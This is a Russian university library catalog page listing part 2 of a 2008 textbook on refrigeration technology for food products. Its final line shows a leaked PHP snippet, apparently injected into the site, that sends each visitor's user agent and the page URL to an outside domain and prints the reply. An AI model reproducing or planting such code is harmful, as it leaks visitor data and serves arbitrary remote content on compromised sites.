Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

104 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=FB89BA60-7BE2-ADD4-30B7-B1C7890B5D95$")И(("Ключевые слова=Картофель"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
FB89BA60-7BE2-ADD4-30B7-B1C7890B5D95
(Нет сведений об экземплярах)
FB89BA60-7BE2-ADD4-30B7-B1C7890B5D95
66/Х73
Холодильная технология пищевых продуктов [Текст] : учеб. для вузов по специальности 260504 (270800) "Технология консервов и пищеконцентратов" направления подгот. дипломир. специалиста 260500 (655700) "Технология продовольственных продуктов социального назначения и общественного питания" и магист. программе 260100.68 (552418) "Холодильная технология пищевых продуктов": в 3 ч. - СПб. : ГИОРД, 2008 - 2011. - ISBN 978-5-98879-084-6.
Ч. 2 : Технологические основы / В. И. Филиппов [и др.]. - 2008. - 571, [1] с. : рис., табл. - Библиогр.: с. 568-572. - ISBN 978-5-98879-095-2 : 730.00 р.
УДК 664.8/.9.037(075)

Рубрики:
Пищевые продукты -- Холодильные технологии -- Учебники и пособия

Кл.слова (ненормированные): УЧЕБНИК И ПОСОБИЕ * -- МИКРООРГАНИЗМ -- КОНСЕРВИРОВАНИЕ -- ОХЛАЖДЕНИЕ -- ОВОЩИ -- КАРТОФЕЛЬ -- МЯСО -- РЫБА -- ПТИЦА -- ЯЙЦА -- МОЛОКО -- КОЛБАСА -- КОНСЕРВЫ -- ЖИРЫ -- ПОДМОРАЖИВАНИЕ -- ЗАМОРАЖИВАНИЕ -- ПОЛУФАБРИКАТ -- СУБЛИМАЦИОННАЯ -- СУШКА -- МОРОЗИЛЬНЫЙ -- АППАРАТ -- ОТЕПЛЕНИЕ
Аннотация: Во второй части учебника "Холодильная технология пищевых продуктов" рассматриваются технологические аспекты процессов холодильного консервирования пищевых продуктов. Изложены состав и свойства пищевых продуктов, значение микроорганизмов при холодильном консервировании, технологические режимы холодильной обработки, отепления, размораживания, условия хранения и транспортирования различных видов сырья и продуктов их переработки. Приведены технические средства, применяемые в современной холодильной технологии пищевых продуктов.
Доп. точки доступа:
Филиппов, В. И.
Кременевская, Марианна Игоревна
Куцакова, Валентина Еремеевна
Фролов, Сергей Владимирович

Нет сведений об экземплярах
Держатели документа:
Научная библиотека Омского государственного технического университета : Россия, 644050, г. Омск, проспект Мира, 11
Держатели документа (Информация об экземплярах) 

Во второй части учебника "Холодильная технология пищевых продуктов" рассматриваются технологические аспекты процессов холодильного консервирования пищевых продуктов. Изложены состав и свойства пищевых продуктов, значение микроорганизмов при холодильном консервировании, технологические режимы холодильной обработки, отепления, размораживания, условия хранения и транспортирования различных видов сырья и продуктов их переработки. Приведены технические средства, применяемые в современной холодильной технологии пищевых продуктов.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2993 - 20.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.97 с.14 запросов, 0.79c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;